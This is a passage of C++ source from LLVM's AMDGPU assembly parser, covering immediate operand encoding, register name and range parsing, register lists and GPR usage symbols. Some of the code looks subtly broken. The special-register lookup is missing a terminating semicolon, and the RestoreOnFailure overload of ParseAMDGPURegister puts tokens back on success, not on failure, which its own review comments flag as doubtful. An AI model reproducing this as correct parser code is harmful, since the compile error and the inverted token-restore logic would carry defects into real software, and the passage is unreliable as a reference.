AsmParser->hasInv2PiInlineImm())) {
Inst.addOperand(MCOperand::createImm(Literal.getZExtValue()));
setImmKindConst();
return;
}
// Non-inlineable
if (AMDGPU::isSISrcFPOperand(InstDesc, OpNum)) { // Expected 64-bit fp operand
// For fp operands we check if low 32 bits are zeros
if (Literal.getLoBits(32) != 0) {
const_cast<AMDGPUAsmParser *>(AsmParser)->Warning(Inst.getLoc(),
"Can't encode literal as exact 64-bit floating-point operand. "
"Low 32-bits will be set to zero");
}
// Only the high 32 bits of the double are encoded; hardware pads
// the low half with zeroes.
Inst.addOperand(MCOperand::createImm(Literal.lshr(32).getZExtValue()));
setImmKindLiteral();
return;
}
// We don't allow fp literals in 64-bit integer instructions. It is
// unclear how we should encode them. This case should be checked earlier
// in predicate methods (isLiteralImm())
llvm_unreachable("fp literal in 64-bit integer instruction.");
case AMDGPU::OPERAND_REG_IMM_INT32:
case AMDGPU::OPERAND_REG_IMM_FP32:
case AMDGPU::OPERAND_REG_IMM_FP32_DEFERRED:
case AMDGPU::OPERAND_REG_INLINE_C_INT32:
case AMDGPU::OPERAND_REG_INLINE_C_FP32:
case AMDGPU::OPERAND_REG_INLINE_AC_INT32:
case AMDGPU::OPERAND_REG_INLINE_AC_FP32:
case AMDGPU::OPERAND_REG_IMM_INT16:
case AMDGPU::OPERAND_REG_IMM_FP16:
case AMDGPU::OPERAND_REG_IMM_FP16_DEFERRED:
case AMDGPU::OPERAND_REG_INLINE_C_INT16:
case AMDGPU::OPERAND_REG_INLINE_C_FP16:
case AMDGPU::OPERAND_REG_INLINE_C_V2INT16:
case AMDGPU::OPERAND_REG_INLINE_C_V2FP16:
case AMDGPU::OPERAND_REG_INLINE_AC_INT16:
case AMDGPU::OPERAND_REG_INLINE_AC_FP16:
case AMDGPU::OPERAND_REG_INLINE_AC_V2INT16:
case AMDGPU::OPERAND_REG_INLINE_AC_V2FP16:
case AMDGPU::OPERAND_REG_IMM_V2INT16:
case AMDGPU::OPERAND_REG_IMM_V2FP16:
case AMDGPU::OPERAND_REG_INLINE_C_V2FP32:
case AMDGPU::OPERAND_REG_IMM_V2FP32:
case AMDGPU::OPERAND_REG_INLINE_C_V2INT32:
case AMDGPU::OPERAND_REG_IMM_V2INT32:
case AMDGPU::OPERAND_KIMM32:
case AMDGPU::OPERAND_KIMM16: {
bool lost;
APFloat FPLiteral(APFloat::IEEEdouble(), Literal);
// Convert literal to single precision
FPLiteral.convert(*getOpFltSemantics(OpTy),
APFloat::rmNearestTiesToEven, &lost);
// We allow precision lost but not overflow or underflow. This should be
// checked earlier in isLiteralImm()
uint64_t ImmVal = FPLiteral.bitcastToAPInt().getZExtValue();
Inst.addOperand(MCOperand::createImm(ImmVal));
setImmKindLiteral();
return;
}
default:
llvm_unreachable("invalid operand size");
}
return;
}
// We got int literal token.
// Only sign extend inline immediates.
switch (OpTy) {
case AMDGPU::OPERAND_REG_IMM_INT32:
case AMDGPU::OPERAND_REG_IMM_FP32:
case AMDGPU::OPERAND_REG_IMM_FP32_DEFERRED:
case AMDGPU::OPERAND_REG_INLINE_C_INT32:
case AMDGPU::OPERAND_REG_INLINE_C_FP32:
case AMDGPU::OPERAND_REG_INLINE_AC_INT32:
case AMDGPU::OPERAND_REG_INLINE_AC_FP32:
case AMDGPU::OPERAND_REG_IMM_V2INT16:
case AMDGPU::OPERAND_REG_IMM_V2FP16:
case AMDGPU::OPERAND_REG_IMM_V2FP32:
case AMDGPU::OPERAND_REG_INLINE_C_V2FP32:
case AMDGPU::OPERAND_REG_IMM_V2INT32:
case AMDGPU::OPERAND_REG_INLINE_C_V2INT32:
if (isSafeTruncation(Val, 32) &&
AMDGPU::isInlinableLiteral32(static_cast<int32_t>(Val),
AsmParser->hasInv2PiInlineImm())) {
Inst.addOperand(MCOperand::createImm(Val));
setImmKindConst();
return;
}
Inst.addOperand(MCOperand::createImm(Val & 0xffffffff));
setImmKindLiteral();
return;
case AMDGPU::OPERAND_REG_IMM_INT64:
case AMDGPU::OPERAND_REG_IMM_FP64:
case AMDGPU::OPERAND_REG_INLINE_C_INT64:
case AMDGPU::OPERAND_REG_INLINE_C_FP64:
case AMDGPU::OPERAND_REG_INLINE_AC_FP64:
if (AMDGPU::isInlinableLiteral64(Val, AsmParser->hasInv2PiInlineImm())) {
Inst.addOperand(MCOperand::createImm(Val));
setImmKindConst();
return;
}
Inst.addOperand(MCOperand::createImm(Lo_32(Val)));
setImmKindLiteral();
return;
case AMDGPU::OPERAND_REG_IMM_INT16:
case AMDGPU::OPERAND_REG_IMM_FP16:
case AMDGPU::OPERAND_REG_IMM_FP16_DEFERRED:
case AMDGPU::OPERAND_REG_INLINE_C_INT16:
case AMDGPU::OPERAND_REG_INLINE_C_FP16:
case AMDGPU::OPERAND_REG_INLINE_AC_INT16:
case AMDGPU::OPERAND_REG_INLINE_AC_FP16:
if (isSafeTruncation(Val, 16) &&
AMDGPU::isInlinableLiteral16(static_cast<int16_t>(Val),
AsmParser->hasInv2PiInlineImm())) {
Inst.addOperand(MCOperand::createImm(Val));
setImmKindConst();
return;
}
Inst.addOperand(MCOperand::createImm(Val & 0xffff));
setImmKindLiteral();
return;
case AMDGPU::OPERAND_REG_INLINE_C_V2INT16:
case AMDGPU::OPERAND_REG_INLINE_C_V2FP16:
case AMDGPU::OPERAND_REG_INLINE_AC_V2INT16:
case AMDGPU::OPERAND_REG_INLINE_AC_V2FP16: {
// Inline-only packed-16 operand kinds: inlinability was established by
// the predicate methods, so just assert it here.
assert(isSafeTruncation(Val, 16));
assert(AMDGPU::isInlinableLiteral16(static_cast<int16_t>(Val),
AsmParser->hasInv2PiInlineImm()));
Inst.addOperand(MCOperand::createImm(Val));
return;
}
case AMDGPU::OPERAND_KIMM32:
Inst.addOperand(MCOperand::createImm(Literal.getLoBits(32).getZExtValue()));
setImmKindNone();
return;
case AMDGPU::OPERAND_KIMM16:
Inst.addOperand(MCOperand::createImm(Literal.getLoBits(16).getZExtValue()));
setImmKindNone();
return;
default:
llvm_unreachable("invalid operand size");
}
}
// Adds this immediate as a KImm FP operand of the given bit width.
// Integer tokens are truncated to Bitwidth; FP tokens are converted from
// double to the Bitwidth-sized IEEE type and encoded bit-for-bit.
template <unsigned Bitwidth>
void AMDGPUOperand::addKImmFPOperands(MCInst &Inst, unsigned N) const {
APInt Literal(64, Imm.Val);
setImmKindNone();
if (!Imm.IsFPImm) {
// We got int literal token.
Inst.addOperand(MCOperand::createImm(Literal.getLoBits(Bitwidth).getZExtValue()));
return;
}
bool Lost;
APFloat FPLiteral(APFloat::IEEEdouble(), Literal);
FPLiteral.convert(*getFltSemantics(Bitwidth / 8),
APFloat::rmNearestTiesToEven, &Lost);
Inst.addOperand(MCOperand::createImm(FPLiteral.bitcastToAPInt().getZExtValue()));
}
// Adds this register operand to Inst, translating the parsed register to
// the subtarget-specific MC register number.
void AMDGPUOperand::addRegOperands(MCInst &Inst, unsigned N) const {
Inst.addOperand(MCOperand::createReg(AMDGPU::getMCReg(getReg(), AsmParser->getSTI())));
}
// True for the "named inline value" pseudo-registers (shared/private
// apertures, POPS wave id, vccz/execz/scc and the null SGPR) that encode
// as inline constants rather than real registers.
static bool isInlineValue(unsigned Reg) {
  switch (Reg) {
  case AMDGPU::SRC_SHARED_BASE:
  case AMDGPU::SRC_SHARED_LIMIT:
  case AMDGPU::SRC_PRIVATE_BASE:
  case AMDGPU::SRC_PRIVATE_LIMIT:
  case AMDGPU::SRC_POPS_EXITING_WAVE_ID:
  case AMDGPU::SRC_VCCZ:
  case AMDGPU::SRC_EXECZ:
  case AMDGPU::SRC_SCC:
  case AMDGPU::SGPR_NULL:
    return true;
  default:
    return false;
  }
}
// Member wrapper: this operand is a register and one of the named inline
// values recognized by the static helper above.
bool AMDGPUOperand::isInlineValue() const {
return isRegKind() && ::isInlineValue(getReg());
}
//===----------------------------------------------------------------------===//
// AsmParser
//===----------------------------------------------------------------------===//
// Maps a register kind plus a tuple width (counted in 32-bit registers) to
// the corresponding register class ID, or -1 if that width is not
// supported for the kind. Note the supported widths differ per kind
// (e.g. TTMP has no 96/160/192/224-bit classes).
static int getRegClass(RegisterKind Is, unsigned RegWidth) {
if (Is == IS_VGPR) {
switch (RegWidth) {
default: return -1;
case 1: return AMDGPU::VGPR_32RegClassID;
case 2: return AMDGPU::VReg_64RegClassID;
case 3: return AMDGPU::VReg_96RegClassID;
case 4: return AMDGPU::VReg_128RegClassID;
case 5: return AMDGPU::VReg_160RegClassID;
case 6: return AMDGPU::VReg_192RegClassID;
case 7: return AMDGPU::VReg_224RegClassID;
case 8: return AMDGPU::VReg_256RegClassID;
case 16: return AMDGPU::VReg_512RegClassID;
case 32: return AMDGPU::VReg_1024RegClassID;
}
} else if (Is == IS_TTMP) {
switch (RegWidth) {
default: return -1;
case 1: return AMDGPU::TTMP_32RegClassID;
case 2: return AMDGPU::TTMP_64RegClassID;
case 4: return AMDGPU::TTMP_128RegClassID;
case 8: return AMDGPU::TTMP_256RegClassID;
case 16: return AMDGPU::TTMP_512RegClassID;
}
} else if (Is == IS_SGPR) {
switch (RegWidth) {
default: return -1;
case 1: return AMDGPU::SGPR_32RegClassID;
case 2: return AMDGPU::SGPR_64RegClassID;
case 3: return AMDGPU::SGPR_96RegClassID;
case 4: return AMDGPU::SGPR_128RegClassID;
case 5: return AMDGPU::SGPR_160RegClassID;
case 6: return AMDGPU::SGPR_192RegClassID;
case 7: return AMDGPU::SGPR_224RegClassID;
case 8: return AMDGPU::SGPR_256RegClassID;
case 16: return AMDGPU::SGPR_512RegClassID;
}
} else if (Is == IS_AGPR) {
switch (RegWidth) {
default: return -1;
case 1: return AMDGPU::AGPR_32RegClassID;
case 2: return AMDGPU::AReg_64RegClassID;
case 3: return AMDGPU::AReg_96RegClassID;
case 4: return AMDGPU::AReg_128RegClassID;
case 5: return AMDGPU::AReg_160RegClassID;
case 6: return AMDGPU::AReg_192RegClassID;
case 7: return AMDGPU::AReg_224RegClassID;
case 8: return AMDGPU::AReg_256RegClassID;
case 16: return AMDGPU::AReg_512RegClassID;
case 32: return AMDGPU::AReg_1024RegClassID;
}
}
return -1;
}
// Resolves the assembly name of a special (non-numbered) register to its
// MC register, or AMDGPU::NoRegister if the name is not recognized. Most
// registers accept both a short name and an "src_"-prefixed alias.
static unsigned getSpecialRegForName(StringRef RegName) {
return StringSwitch<unsigned>(RegName)
.Case("exec", AMDGPU::EXEC)
.Case("vcc", AMDGPU::VCC)
.Case("flat_scratch", AMDGPU::FLAT_SCR)
.Case("xnack_mask", AMDGPU::XNACK_MASK)
.Case("shared_base", AMDGPU::SRC_SHARED_BASE)
.Case("src_shared_base", AMDGPU::SRC_SHARED_BASE)
.Case("shared_limit", AMDGPU::SRC_SHARED_LIMIT)
.Case("src_shared_limit", AMDGPU::SRC_SHARED_LIMIT)
.Case("private_base", AMDGPU::SRC_PRIVATE_BASE)
.Case("src_private_base", AMDGPU::SRC_PRIVATE_BASE)
.Case("private_limit", AMDGPU::SRC_PRIVATE_LIMIT)
.Case("src_private_limit", AMDGPU::SRC_PRIVATE_LIMIT)
.Case("pops_exiting_wave_id", AMDGPU::SRC_POPS_EXITING_WAVE_ID)
.Case("src_pops_exiting_wave_id", AMDGPU::SRC_POPS_EXITING_WAVE_ID)
.Case("lds_direct", AMDGPU::LDS_DIRECT)
.Case("src_lds_direct", AMDGPU::LDS_DIRECT)
.Case("m0", AMDGPU::M0)
.Case("vccz", AMDGPU::SRC_VCCZ)
.Case("src_vccz", AMDGPU::SRC_VCCZ)
.Case("execz", AMDGPU::SRC_EXECZ)
.Case("src_execz", AMDGPU::SRC_EXECZ)
.Case("scc", AMDGPU::SRC_SCC)
.Case("src_scc", AMDGPU::SRC_SCC)
.Case("tba", AMDGPU::TBA)
.Case("tma", AMDGPU::TMA)
.Case("flat_scratch_lo", AMDGPU::FLAT_SCR_LO)
.Case("flat_scratch_hi", AMDGPU::FLAT_SCR_HI)
.Case("xnack_mask_lo", AMDGPU::XNACK_MASK_LO)
.Case("xnack_mask_hi", AMDGPU::XNACK_MASK_HI)
.Case("vcc_lo", AMDGPU::VCC_LO)
.Case("vcc_hi", AMDGPU::VCC_HI)
.Case("exec_lo", AMDGPU::EXEC_LO)
.Case("exec_hi", AMDGPU::EXEC_HI)
.Case("tma_lo", AMDGPU::TMA_LO)
.Case("tma_hi", AMDGPU::TMA_HI)
.Case("tba_lo", AMDGPU::TBA_LO)
.Case("tba_hi", AMDGPU::TBA_HI)
.Case("pc", AMDGPU::PC_REG)
.Case("null", AMDGPU::SGPR_NULL)
.Default(AMDGPU::NoRegister)
}
// Parses a register at the current position, returning true on failure.
// On success fills RegNo and the source range. Note: RestoreOnFailure is
// not consulted in this overload — failure recovery is presumably handled
// by the caller clearing pending errors (see tryParseRegister below);
// TODO confirm that is the intent.
bool AMDGPUAsmParser::ParseRegister(unsigned &RegNo, SMLoc &StartLoc,
SMLoc &EndLoc, bool RestoreOnFailure) {
auto R = parseRegister();
if (!R) return true;
assert(R->isReg());
RegNo = R->getReg();
StartLoc = R->getStartLoc();
EndLoc = R->getEndLoc();
return false;
}
// MCTargetAsmParser entry point: parse without restore-on-failure.
bool AMDGPUAsmParser::ParseRegister(unsigned &RegNo, SMLoc &StartLoc,
SMLoc &EndLoc) {
return ParseRegister(RegNo, StartLoc, EndLoc, /*RestoreOnFailure=*/false);
}
// Speculative register parse: any diagnostics raised while parsing are
// swallowed and reported as ParseFail; a clean non-match is NoMatch.
OperandMatchResultTy AMDGPUAsmParser::tryParseRegister(unsigned &RegNo,
                                                       SMLoc &StartLoc,
                                                       SMLoc &EndLoc) {
  const bool Failed =
      ParseRegister(RegNo, StartLoc, EndLoc, /*RestoreOnFailure=*/true);
  const bool HadPendingErrors = getParser().hasPendingError();
  getParser().clearPendingErrors();
  if (HadPendingErrors)
    return MatchOperand_ParseFail;
  return Failed ? MatchOperand_NoMatch : MatchOperand_Success;
}
bool AMDGPUAsmParser::AddNextRegisterToList(unsigned &Reg, unsigned &RegWidth,
RegisterKind RegKind, unsigned Reg1,
SMLoc Loc) {
switch (RegKind) {
case IS_SPECIAL:
if (Reg == AMDGPU::EXEC_LO && Reg1 == AMDGPU::EXEC_HI) {
Reg = AMDGPU::EXEC;
RegWidth = 2;
return true;
}
if (Reg == AMDGPU::FLAT_SCR_LO && Reg1 == AMDGPU::FLAT_SCR_HI) {
Reg = AMDGPU::FLAT_SCR;
RegWidth = 2;
return true;
}
if (Reg == AMDGPU::XNACK_MASK_LO && Reg1 == AMDGPU::XNACK_MASK_HI) {
Reg = AMDGPU::XNACK_MASK;
RegWidth = 2;
return true;
}
if (Reg == AMDGPU::VCC_LO && Reg1 == AMDGPU::VCC_HI) {
Reg = AMDGPU::VCC;
RegWidth = 2;
return true;
}
if (Reg == AMDGPU::TBA_LO && Reg1 == AMDGPU::TBA_HI) {
Reg = AMDGPU::TBA;
RegWidth = 2;
return true;
}
if (Reg == AMDGPU::TMA_LO && Reg1 == AMDGPU::TMA_HI) {
Reg = AMDGPU::TMA;
RegWidth = 2;
return true;
}
Error(Loc, "register does not fit in the list");
return false;
case IS_VGPR:
case IS_SGPR:
case IS_AGPR:
case IS_TTMP:
if (Reg1 != Reg + RegWidth) {
Error(Loc, "registers in a list must have consecutive indices");
return false;
}
RegWidth++;
return true;
default:
llvm_unreachable("unexpected register kind");
}
}
// Name prefix -> register kind mapping for "regular" (numbered) registers.
struct RegInfo {
StringLiteral Name;
RegisterKind Kind;
};
// Prefix table; order matters for prefix matching ("acc" must be tried
// before its one-letter alias "a").
static constexpr RegInfo RegularRegisters[] = {
{{"v"}, IS_VGPR},
{{"s"}, IS_SGPR},
{{"ttmp"}, IS_TTMP},
{{"acc"}, IS_AGPR},
{{"a"}, IS_AGPR},
};
// True for the numbered register kinds (as opposed to special registers).
static bool isRegularReg(RegisterKind Kind) {
  switch (Kind) {
  case IS_VGPR:
  case IS_SGPR:
  case IS_TTMP:
  case IS_AGPR:
    return true;
  default:
    return false;
  }
}
// Finds the first table entry whose name prefixes Str, or nullptr.
// First match wins, so longer prefixes ("acc") must precede shorter
// ones ("a") in the table.
static const RegInfo* getRegularRegInfo(StringRef Str) {
  const RegInfo *Found = nullptr;
  for (const RegInfo &Candidate : RegularRegisters) {
    if (Str.startswith(Candidate.Name)) {
      Found = &Candidate;
      break;
    }
  }
  return Found;
}
// Parses Str as a base-10 register index into Num; returns true on success.
static bool getRegNum(StringRef Str, unsigned& Num) {
return !Str.getAsInteger(10, Num);
}
bool
AMDGPUAsmParser::isRegister(const AsmToken &Token,
const AsmToken &NextToken) const {
// A list of consecutive registers: [s0,s1,s2,s3]
if (Token.is(AsmToken::LBrac))
return true;
if (!Token.is(AsmToken::Identifier))
return false;
// A single register like s0 or a range of registers like s[0:1]
StringRef Str = Token.getString();
const RegInfo *Reg = getRegularRegInfo(Str);
if (Reg) {
StringRef RegName = Reg->Name;
StringRef RegSuffix = Str.substr(RegName.size());
if (!RegSuffix.empty()) {
unsigned Num;
// A single register with an index: rXX
if (getRegNum(RegSuffix, Num))
return true;
} else {
// A range of registers: r[XX:YY].
if (NextToken.is(AsmToken::LBrac))
return true;
}
}
return getSpecialRegForName(Str) != AMDGPU::NoRegister;
}
// Convenience overload over the current token and one-token lookahead.
bool
AMDGPUAsmParser::isRegister()
{
return isRegister(getToken(), peekToken());
}
// Resolves a regular register reference (kind + first index + tuple width)
// to an MC register. Emits a diagnostic at Loc and returns NoRegister when
// the index is misaligned, the width has no register class, or the index
// exceeds the class size.
unsigned
AMDGPUAsmParser::getRegularReg(RegisterKind RegKind,
                               unsigned RegNum,
                               unsigned RegWidth,
                               SMLoc Loc) {
  assert(isRegularReg(RegKind));
  // SGPR and TTMP tuples must be index-aligned; the maximum required
  // alignment is 4 dwords.
  const bool NeedsAlignment = (RegKind == IS_SGPR || RegKind == IS_TTMP);
  const unsigned AlignSize = NeedsAlignment ? std::min(RegWidth, 4u) : 1;
  if (RegNum % AlignSize != 0) {
    Error(Loc, "invalid register alignment");
    return AMDGPU::NoRegister;
  }
  const int RCID = getRegClass(RegKind, RegWidth);
  if (RCID == -1) {
    Error(Loc, "invalid or unsupported register size");
    return AMDGPU::NoRegister;
  }
  const MCRegisterInfo *TRI = getContext().getRegisterInfo();
  const MCRegisterClass RC = TRI->getRegClass(RCID);
  const unsigned RegIdx = RegNum / AlignSize;
  if (RegIdx >= RC.getNumRegs()) {
    Error(Loc, "register index is out of range");
    return AMDGPU::NoRegister;
  }
  return RC.getRegister(RegIdx);
}
// Parse a bracketed register index or range: "[XX]" or "[XX:YY]".
// On success Num holds the first index and Width the number of
// registers (1 for the single-index form).
bool
AMDGPUAsmParser::ParseRegRange(unsigned& Num, unsigned& Width) {
  int64_t RegLo, RegHi;
  if (!skipToken(AsmToken::LBrac, "missing register index"))
    return false;

  SMLoc FirstIdxLoc = getLoc();
  SMLoc SecondIdxLoc;

  if (!parseExpr(RegLo))
    return false;

  if (trySkipToken(AsmToken::Colon)) {
    SecondIdxLoc = getLoc();
    if (!parseExpr(RegHi))
      return false;
  } else {
    // "[XX]" is shorthand for "[XX:XX]".
    RegHi = RegLo;
  }

  if (!skipToken(AsmToken::RBrac, "expected a closing square bracket"))
    return false;

  if (!isUInt<32>(RegLo)) {
    Error(FirstIdxLoc, "invalid register index");
    return false;
  }

  // If no colon was present, RegHi == RegLo, so a valid RegLo implies
  // a valid RegHi and the default-constructed SecondIdxLoc is unused.
  if (!isUInt<32>(RegHi)) {
    Error(SecondIdxLoc, "invalid register index");
    return false;
  }

  if (RegLo > RegHi) {
    Error(FirstIdxLoc, "first register index should not exceed second index");
    return false;
  }

  Num = static_cast<unsigned>(RegLo);
  Width = (RegHi - RegLo) + 1;
  return true;
}
// Try to parse the current identifier as a special register (vcc,
// exec, ...). On success the name token is consumed (and appended to
// Tokens) and the register is returned; otherwise nothing is consumed
// and the function returns AMDGPU::NoRegister without an error.
unsigned AMDGPUAsmParser::ParseSpecialReg(RegisterKind &RegKind,
                                          unsigned &RegNum, unsigned &RegWidth,
                                          SmallVectorImpl<AsmToken> &Tokens) {
  assert(isToken(AsmToken::Identifier));
  unsigned Reg = getSpecialRegForName(getTokenStr());
  if (!Reg)
    return Reg;

  RegKind = IS_SPECIAL;
  RegNum = 0;
  RegWidth = 1;
  Tokens.push_back(getToken());
  lex(); // skip register name
  return Reg;
}
// Parse a regular register reference: "vXX" (single dword) or
// "v[XX:YY]" (range). The consumed name token is appended to Tokens so
// callers can unlex it later. Returns AMDGPU::NoRegister with a
// pending error on failure.
unsigned AMDGPUAsmParser::ParseRegularReg(RegisterKind &RegKind,
                                          unsigned &RegNum, unsigned &RegWidth,
                                          SmallVectorImpl<AsmToken> &Tokens) {
  assert(isToken(AsmToken::Identifier));
  StringRef RegName = getTokenStr();
  auto Loc = getLoc();

  const RegInfo *RI = getRegularRegInfo(RegName);
  if (!RI) {
    Error(Loc, "invalid register name");
    return AMDGPU::NoRegister;
  }

  Tokens.push_back(getToken());
  lex(); // skip register name

  RegKind = RI->Kind;
  // Anything after the prefix must be a plain decimal index.
  StringRef RegSuffix = RegName.substr(RI->Name.size());
  if (!RegSuffix.empty()) {
    // Single 32-bit register: vXX.
    if (!getRegNum(RegSuffix, RegNum)) {
      Error(Loc, "invalid register index");
      return AMDGPU::NoRegister;
    }
    RegWidth = 1;
  } else {
    // Range of registers: v[XX:YY]. ":YY" is optional.
    if (!ParseRegRange(RegNum, RegWidth))
      return AMDGPU::NoRegister;
  }

  return getRegularReg(RegKind, RegNum, RegWidth, Loc);
}
// Parse a list of consecutive 32-bit registers, e.g. [s0,s1,s2,s3].
// All elements must be single-dword registers of the same kind; the
// result is the covering register tuple. Returns AMDGPU::NoRegister
// with a pending error on failure.
unsigned AMDGPUAsmParser::ParseRegList(RegisterKind &RegKind, unsigned &RegNum,
                                       unsigned &RegWidth,
                                       SmallVectorImpl<AsmToken> &Tokens) {
  unsigned Reg = AMDGPU::NoRegister;
  auto ListLoc = getLoc();

  if (!skipToken(AsmToken::LBrac,
                 "expected a register or a list of registers")) {
    return AMDGPU::NoRegister;
  }

  // List of consecutive registers, e.g.: [s0,s1,s2,s3]

  auto Loc = getLoc();
  // Pass Tokens here as well so the first element's tokens are
  // recorded like those of the subsequent elements; otherwise this
  // call resolved to the bool-flag overload and the RestoreOnFailure
  // unlex path could not restore the whole list.
  if (!ParseAMDGPURegister(RegKind, Reg, RegNum, RegWidth, Tokens))
    return AMDGPU::NoRegister;
  if (RegWidth != 1) {
    Error(Loc, "expected a single 32-bit register");
    return AMDGPU::NoRegister;
  }

  for (; trySkipToken(AsmToken::Comma); ) {
    RegisterKind NextRegKind;
    unsigned NextReg, NextRegNum, NextRegWidth;
    Loc = getLoc();

    if (!ParseAMDGPURegister(NextRegKind, NextReg,
                             NextRegNum, NextRegWidth,
                             Tokens)) {
      return AMDGPU::NoRegister;
    }
    if (NextRegWidth != 1) {
      Error(Loc, "expected a single 32-bit register");
      return AMDGPU::NoRegister;
    }
    if (NextRegKind != RegKind) {
      Error(Loc, "registers in a list must be of the same kind");
      return AMDGPU::NoRegister;
    }
    // Extends RegWidth by one and checks adjacency.
    if (!AddNextRegisterToList(Reg, RegWidth, RegKind, NextReg, Loc))
      return AMDGPU::NoRegister;
  }

  if (!skipToken(AsmToken::RBrac,
                 "expected a comma or a closing square bracket")) {
    return AMDGPU::NoRegister;
  }

  // Re-resolve the accumulated (num, width) as one wide register.
  if (isRegularReg(RegKind))
    Reg = getRegularReg(RegKind, RegNum, RegWidth, ListLoc);

  return Reg;
}
// Parse any register operand: a special register, a regular register
// (single or ranged), or a bracketed register list. Register-name
// tokens consumed by the sub-parsers are recorded in Tokens. On
// failure an error has already been emitted by a sub-parser or here.
bool AMDGPUAsmParser::ParseAMDGPURegister(RegisterKind &RegKind, unsigned &Reg,
                                          unsigned &RegNum, unsigned &RegWidth,
                                          SmallVectorImpl<AsmToken> &Tokens) {
  auto Loc = getLoc();
  Reg = AMDGPU::NoRegister;

  if (isToken(AsmToken::Identifier)) {
    // Special names take priority; fall back to v/s/ttmp/a prefixes.
    Reg = ParseSpecialReg(RegKind, RegNum, RegWidth, Tokens);
    if (Reg == AMDGPU::NoRegister)
      Reg = ParseRegularReg(RegKind, RegNum, RegWidth, Tokens);
  } else {
    Reg = ParseRegList(RegKind, RegNum, RegWidth, Tokens);
  }

  const MCRegisterInfo *TRI = getContext().getRegisterInfo();
  if (Reg == AMDGPU::NoRegister) {
    // Sub-parsers report their own diagnostics.
    assert(Parser.hasPendingError());
    return false;
  }

  if (!subtargetHasRegister(*TRI, Reg)) {
    if (Reg == AMDGPU::SGPR_NULL) {
      Error(Loc, "'null' operand is not supported on this GPU");
    } else {
      Error(Loc, "register not available on this GPU");
    }
    return false;
  }

  return true;
}
// Convenience overload that owns the token bookkeeping.
// NOTE(review): despite the parameter name, tokens are unlexed when
// the parse SUCCEEDS — presumably so a caller can probe for a register
// without consuming input; on failure the tokens stay consumed and a
// pending error remains. Confirm this asymmetry against the callers.
bool AMDGPUAsmParser::ParseAMDGPURegister(RegisterKind &RegKind, unsigned &Reg,
                                          unsigned &RegNum, unsigned &RegWidth,
                                          bool RestoreOnFailure /*=false*/) {
  Reg = AMDGPU::NoRegister;

  SmallVector<AsmToken, 1> Tokens;
  if (ParseAMDGPURegister(RegKind, Reg, RegNum, RegWidth, Tokens)) {
    if (RestoreOnFailure) {
      // Push tokens back in reverse order of consumption.
      while (!Tokens.empty()) {
        getLexer().UnLex(Tokens.pop_back_val());
      }
    }
    return true;
  }
  return false;
}
// Name of the MC symbol that tracks the next free GPR of the given
// kind; None for kinds that are not tracked (TTMP, AGPR, special).
Optional<StringRef>
AMDGPUAsmParser::getGprCountSymbolName(RegisterKind RegKind) {
  if (RegKind == IS_VGPR)
    return StringRef(".amdgcn.next_free_vgpr");
  if (RegKind == IS_SGPR)
    return StringRef(".amdgcn.next_free_sgpr");
  return None;
}
// Create (or reset) the GPR-count tracking symbol for RegKind with an
// initial value of zero.
void AMDGPUAsmParser::initializeGprCountSymbol(RegisterKind RegKind) {
  auto Name = getGprCountSymbolName(RegKind);
  assert(Name && "initializing invalid register kind");
  MCSymbol *CountSym = getContext().getOrCreateSymbol(*Name);
  CountSym->setVariableValue(MCConstantExpr::create(0, getContext()));
}
// Record GPR usage in the .amdgcn.next_free_{v,s}gpr symbols (the
// symbol holds "max dword index used + 1"). Returns false, with a
// diagnostic, only when an existing symbol is not an absolute
// variable; otherwise true.
bool AMDGPUAsmParser::updateGprCountSymbols(RegisterKind RegKind,
                                            unsigned DwordRegIndex,
                                            unsigned RegWidth) {
  // Symbols are only defined for GCN targets
  if (AMDGPU::getIsaVersion(getSTI().getCPU()).Major < 6)
    return true;

  // Untracked kinds (TTMP, AGPR, special) are silently accepted.
  auto SymbolName = getGprCountSymbolName(RegKind);
  if (!SymbolName)
    return true;
  MCSymbol *Sym = getContext().getOrCreateSymbol(*SymbolName);

  int64_t NewMax = DwordRegIndex + RegWidth - 1;
  int64_t OldCount;

  if (!Sym->isVariable())
    return !Error(getLoc(),
                  ".amdgcn.next_free_{v,s}gpr symbols must be variable");
  if (!Sym->getVariableValue(false)->evaluateAsAbsolute(OldCount))
    return !Error(
        getLoc(),
        ".amdgcn.next_free_{v,s}gpr symbols must be absolute expressions");

  // Only ever grow the count.
  if (OldCount <= NewMax)
    Sym->setVariableValue(MCConstantExpr::create(NewMax + 1, getContext()));

  return true;
}
// Parse a register operand and wrap it in an AMDGPUOperand; nullptr on
// failure (an error is pending). Also updates the per-kernel GPR
// bookkeeping appropriate for the HSA ABI version in use.
// NOTE(review): the RestoreOnFailure argument is not forwarded to
// ParseAMDGPURegister below — confirm whether that is intentional.
std::unique_ptr<AMDGPUOperand>
AMDGPUAsmParser::parseRegister(bool RestoreOnFailure) {
  const auto &Tok = getToken();
  SMLoc StartLoc = Tok.getLoc();
  SMLoc EndLoc = Tok.getEndLoc();
  RegisterKind RegKind;
  unsigned Reg, RegNum, RegWidth;

  if (!ParseAMDGPURegister(RegKind, Reg, RegNum, RegWidth)) {
    return nullptr;
  }
  if (isHsaAbiVersion3AndAbove(&getSTI())) {
    // Code-object v3+ tracks usage via MC symbols.
    if (!updateGprCountSymbols(RegKind, RegNum, RegWidth))
      return nullptr;
  } else
    KernelScope.usesRegister(RegKind, RegNum, RegWidth);
  return AMDGPUOperand::CreateReg(this, Reg, StartLoc, EndLoc);
}
// Parse an immediate operand: a floating-point literal (with an
// optional leading '-') or an integer/symbolic expression.
// HasSP3AbsModifier indicates the operand appears inside SP3 '|...|',
// which needs restricted expression parsing (see below).
OperandMatchResultTy
AMDGPUAsmParser::parseImm(OperandVector &Operands, bool HasSP3AbsModifier) {
  // TODO: add syntactic sugar for 1/(2*PI)

  assert(!isRegister());
  assert(!isModifier());

  const auto& Tok = getToken();
  const auto& NextTok = peekToken();
  bool IsReal = Tok.is(AsmToken::Real);
  SMLoc S = getLoc();
  bool Negate = false;

  // Fold "- <real>" into a signed fp literal; fp expressions are not
  // supported, only literals with an optional sign.
  if (!IsReal && Tok.is(AsmToken::Minus) && NextTok.is(AsmToken::Real)) {
    lex();
    IsReal = true;
    Negate = true;
  }

  if (IsReal) {
    StringRef Num = getTokenStr();
    lex();

    APFloat RealVal(APFloat::IEEEdouble());
    auto roundMode = APFloat::rmNearestTiesToEven;
    if (errorToBool(RealVal.convertFromString(Num, roundMode).takeError())) {
      return MatchOperand_ParseFail;
    }
    if (Negate)
      RealVal.changeSign();

    Operands.push_back(
      AMDGPUOperand::CreateImm(this, RealVal.bitcastToAPInt().getZExtValue(), S,
                               AMDGPUOperand::ImmTyNone, true));

    return MatchOperand_Success;
  }

